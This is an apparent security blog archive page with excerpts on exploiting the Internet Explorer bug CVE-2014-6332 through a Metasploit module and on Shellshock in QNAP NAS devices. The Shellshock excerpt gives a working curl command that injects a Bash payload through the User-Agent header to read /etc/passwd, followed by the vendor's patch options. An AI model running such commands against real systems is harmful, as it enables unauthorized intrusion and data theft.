Monthly Archives: November 2014

CVE-2014-6332: it’s raining shells

This is a shared post by me (@wez3forsec) and Rik van Duijn (@rikvduijn)

Today @yuange tweeted a proof of concept for CVE-2014-6223. CVE-2014-6332 is a critical Internet Explorer vulnerability that was patched with MS-14-064. The POC was able to execute the application notepad.exe. We wanted to pop some actual shells with this so now the race began to find a way of executing more than just notepad of calc. The “great” thing is this vulnerability affects Windows 95 IE 3.0 until Windows 10 IE 11 from a pentesters perspective this is awesome from a blue team perspective this will make you cry.

We wanted to pop shells that’s why we created a Metasploit module, this allows us to adapt our exploit when needed and gives us the usability of the Metasploit framework. This gives the ability to start lots of different payloads supported by the Metasploit framework. Continue reading

Shellshock: a lot of QNAP’s still vulnerable

Shellshock is a critical bug in the Bash software. Bash is software which is used on a lot of unix based operating systems. Shellshock was disclosed on QNAP_logothe 24th september of 2014, and the bug was assigned CVE-2014-6271. Analysis of the source code history of Bash shows the vulnerabilities had existed since version 1.03 of Bash released in September 1989.

QNAP’s Network Attached Storage (NAS) are vulnerable to Shellshock. The vulnerability can be exploited by (for example) executing the following post CURL command:

curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" http://ip:8080/cgi-bin/authLogin.cgi -v
There are two solutions offered by QNAP in order to fix this vulnerability:

  • Install firmware QTS 4.1.1 Build 1003
  • Install Qfix patch 1.0.1 (QTS 4.1.1 only) or 1.0.2 (QTS 3.8.x, QTS 4.0.x, QTS 4.1.0, QTS4.1.1)

Continue reading